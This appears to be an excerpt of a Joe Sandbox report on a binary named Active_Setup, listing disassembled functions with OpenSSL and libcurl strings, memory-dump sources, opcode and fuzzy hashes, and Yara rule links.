                                                                                                                                                  Function 0103F360 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 374COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: .\crypto\pkcs12\p12_key.c
                                                                                                                                                  • API String ID: 2102423945-3219245189
                                                                                                                                                  • Opcode ID: 675e88ee67cd520a3c178e96a696613a5af57e082f8fef1c7a1c9d9cbe30cfa4
                                                                                                                                                  • Instruction ID: 1cafe51541c07ebe3d11b28d1232e5f4424853b2d513bd3020eb41dd35ed26e3
                                                                                                                                                  • Opcode Fuzzy Hash: 675e88ee67cd520a3c178e96a696613a5af57e082f8fef1c7a1c9d9cbe30cfa4
                                                                                                                                                  • Instruction Fuzzy Hash: 69C1D4B2A483425BD710DB69CC81A6FB7EDBBD4704F08092DFAC587242EA75D905C7A3
                                                                                                                                                  Function 0109D040 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: %s%c%08lx.%s%d$.\crypto\x509\by_dir.c
                                                                                                                                                  • API String ID: 0-2081607520
                                                                                                                                                  • Opcode ID: 54034fb43ced0adbf50f3217718516758c9cf3335bb07d7fc0b0454b042503bf
                                                                                                                                                  • Instruction ID: 8102b0ffefc6a5f154ca088701afacfcab7a13a00bf4d62cdd4484f1b851b73e
                                                                                                                                                  • Opcode Fuzzy Hash: 54034fb43ced0adbf50f3217718516758c9cf3335bb07d7fc0b0454b042503bf
                                                                                                                                                  • Instruction Fuzzy Hash: C2B1D2B5688301AFD720DF58CC52F6BB3E5AF98700F04891DF9D99B281D6B4E940DB92
                                                                                                                                                  Function 00FEA2B0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _strncpy.LIBCMT ref: 00FEA35C
                                                                                                                                                    • Part of subcall function 00FEEC00: _memset.LIBCMT ref: 00FEEC22
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset_strncpy
                                                                                                                                                  • String ID: .\crypto\x509\x509_obj.c$NO X509_NAME
                                                                                                                                                  • API String ID: 3140232205-14672339
                                                                                                                                                  • Opcode ID: cd02dba28f7b0a8c414f0780025b07b8d2edab4bb8795202c4374b2af8a403ed
                                                                                                                                                  • Instruction ID: d9d3a2fafe06ed4996b9b58fa5f341949d176456f371061875afc293468ce164
                                                                                                                                                  • Opcode Fuzzy Hash: cd02dba28f7b0a8c414f0780025b07b8d2edab4bb8795202c4374b2af8a403ed
                                                                                                                                                  • Instruction Fuzzy Hash: EDB1F6719083818FD320DF2AC841B2BB7E1BFD4314F18496DE4C99B292E775E9459B93
                                                                                                                                                  Function 010486D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 277COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\ec\ec2_oct.c
                                                                                                                                                  • API String ID: 0-4139674486
                                                                                                                                                  • Opcode ID: b9bceb4a73c34cb6d2a5a3d1dfce16ee084fe5f0f90050df14fd57288dc6cb52
                                                                                                                                                  • Instruction ID: 909a30b8e747e749300e2a19127e9df56bf09dbf57560cbaac962836881c40d3
                                                                                                                                                  • Opcode Fuzzy Hash: b9bceb4a73c34cb6d2a5a3d1dfce16ee084fe5f0f90050df14fd57288dc6cb52
                                                                                                                                                  • Instruction Fuzzy Hash: 2F812AF6A043016BE710EAA8DC81B6B73D5AB80754F08497AF9C4E7281E675D905C6E3
                                                                                                                                                  Function 01049030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 264COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\ec\ecp_oct.c
                                                                                                                                                  • API String ID: 0-623513382
                                                                                                                                                  • Opcode ID: e1ea908a289f7b43429d4d09ab645baf9c2aa19230a54cbb5e988052e90438c9
                                                                                                                                                  • Instruction ID: b728c43f08fb5294af1bffea648dc5aa5e0ef46a7a591d456c564204dfdc4aee
                                                                                                                                                  • Opcode Fuzzy Hash: e1ea908a289f7b43429d4d09ab645baf9c2aa19230a54cbb5e988052e90438c9
                                                                                                                                                  • Instruction Fuzzy Hash: ED716CF3A443015BE620EA68DC81BAF73D5AB88758F080579FDC4D7381E676E905C6E2
                                                                                                                                                  Function 0109CE40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncmp_strncpy
                                                                                                                                                  • String ID: .\crypto\x509\by_dir.c
                                                                                                                                                  • API String ID: 2634297590-1513729148
                                                                                                                                                  • Opcode ID: cfac8f657bb8e531371ac8219497085306d33de13d3d39046d72cd36c748b288
                                                                                                                                                  • Instruction ID: f61ca995c3a058f57712d1e2341a9e09ec0d72563d8d5725d00ed3a1b5444200
                                                                                                                                                  • Opcode Fuzzy Hash: cfac8f657bb8e531371ac8219497085306d33de13d3d39046d72cd36c748b288
                                                                                                                                                  • Instruction Fuzzy Hash: B75128B6A403025BFF20EE68AD51B9B77C5AF44740F084479FAC9CB341E635E508E3A2
                                                                                                                                                  Function 0103EEB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • .\crypto\hmac\hmac.c, xrefs: 0103EF4E
                                                                                                                                                  • j <= (int)sizeof(ctx->key), xrefs: 0103EF47
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: .\crypto\hmac\hmac.c$j <= (int)sizeof(ctx->key)
                                                                                                                                                  • API String ID: 2102423945-2480544988
                                                                                                                                                  • Opcode ID: 529c8b492c13ca11d788b0445a13059d786318f058fb83f09bca086eefb5fdad
                                                                                                                                                  • Instruction ID: febef5c0fd407bb0cd9bdb03bbd0a14be6cd969a5294555433ab1ee6f09050b1
                                                                                                                                                  • Opcode Fuzzy Hash: 529c8b492c13ca11d788b0445a13059d786318f058fb83f09bca086eefb5fdad
                                                                                                                                                  • Instruction Fuzzy Hash: 4C5188729043469FE770AA69DC41BABB7DDAFD4304F044928FAC6C6142EA75E504C763
                                                                                                                                                  Function 00FC9170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: SSL connection timeout$select/poll on SSL socket, errno: %d
                                                                                                                                                  • API String ID: 0-2573467168
                                                                                                                                                  • Opcode ID: f0c9958661bb0ef69ef5b3a882111f65e884282b7f3f133e976d4fdbd6337bac
                                                                                                                                                  • Instruction ID: e298ff61f7d19339d56ac195916c5a76793510d035f121112470d6fa7e431c7f
                                                                                                                                                  • Opcode Fuzzy Hash: f0c9958661bb0ef69ef5b3a882111f65e884282b7f3f133e976d4fdbd6337bac
                                                                                                                                                  • Instruction Fuzzy Hash: BB512835A082079BDB20DE18AE4BFFA73D5EBC1334F54042EF84186291D7B5D95CE692
                                                                                                                                                  Function 01076910 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: .\ssl\d1_both.c
                                                                                                                                                  • API String ID: 2102423945-2895748750
                                                                                                                                                  • Opcode ID: 5d8eb77238564e66f5671529871cc0907ff198a8dadf9d9360fdd617b5d8e68e
                                                                                                                                                  • Instruction ID: 9cabc7e218911fcd12b27b0f3c73f7661c6b1dce633be28ffe8dd5816dbd8357
                                                                                                                                                  • Opcode Fuzzy Hash: 5d8eb77238564e66f5671529871cc0907ff198a8dadf9d9360fdd617b5d8e68e
                                                                                                                                                  • Instruction Fuzzy Hash: 6351E430A04742AFE310CF19C840BA6BBE4FF95314F0881ADE9895B792D372F854CBA1
                                                                                                                                                  Function 0100E8D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncpy
                                                                                                                                                  • String ID: .\crypto\x509v3\v3_info.c$value=
                                                                                                                                                  • API String ID: 2961919466-1641153843
                                                                                                                                                  • Opcode ID: 53aa807e114af4afdd3c16d5647608eb4b55370e03c5db1865b81579b1738ab8
                                                                                                                                                  • Instruction ID: b02aa5ac6d66c493eca023ccee5606388edeea4e87675fb1a5b0bda0fc917e0a
                                                                                                                                                  • Opcode Fuzzy Hash: 53aa807e114af4afdd3c16d5647608eb4b55370e03c5db1865b81579b1738ab8
                                                                                                                                                  • Instruction Fuzzy Hash: 62411EB574430167F250FA64DC42F7776D96B84B40F48492DFA85AB2C3E665E5048273
                                                                                                                                                  Function 00FB8480 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_multi_remove_handle.ACTIVE_SETUP(?,?), ref: 00FB84A3
                                                                                                                                                  • curl_multi_cleanup.ACTIVE_SETUP(?), ref: 00FB84B3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_multi_cleanupcurl_multi_remove_handle
                                                                                                                                                  • String ID: tP8g
                                                                                                                                                  • API String ID: 3059780880-846472870
                                                                                                                                                  • Opcode ID: 4fc7a50c3ef190c45d56166c20f0aaeb349b65b92d014224c9a0861beffdb05f
                                                                                                                                                  • Instruction ID: 02f3b1c376f9ddf5a810f48dc735fe0cc3dcda55b1d50001bee20aab215d046d
                                                                                                                                                  • Opcode Fuzzy Hash: 4fc7a50c3ef190c45d56166c20f0aaeb349b65b92d014224c9a0861beffdb05f
                                                                                                                                                  • Instruction Fuzzy Hash: BC5193F0D00F008BC6719B2A9D49A87B7E9BF80714F188D19F19BC6205EA36F951DF5A
                                                                                                                                                  Function 01024380 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: %02x%s
                                                                                                                                                  • API String ID: 2102423945-1723692035
                                                                                                                                                  • Opcode ID: 5803d004fb308b4bd4270a049124cb3f43489cc1191e07748edef89bb4d19fb6
                                                                                                                                                  • Instruction ID: 1b4ed8e47d87756f2aea8d98c7797d5d42e99b7331098157868d3d26596d8826
                                                                                                                                                  • Opcode Fuzzy Hash: 5803d004fb308b4bd4270a049124cb3f43489cc1191e07748edef89bb4d19fb6
                                                                                                                                                  • Instruction Fuzzy Hash: 8B3139316043559BE724EB69DC81FBF73D9BF94600F44846DE9C9CB241FE38940887A2
                                                                                                                                                  Function 00FC6F10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,?,%04d-%02d-%02d %02d:%02d:%02d %s,-00000922,?,?,?,?,?,GMT), ref: 00FC7030
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
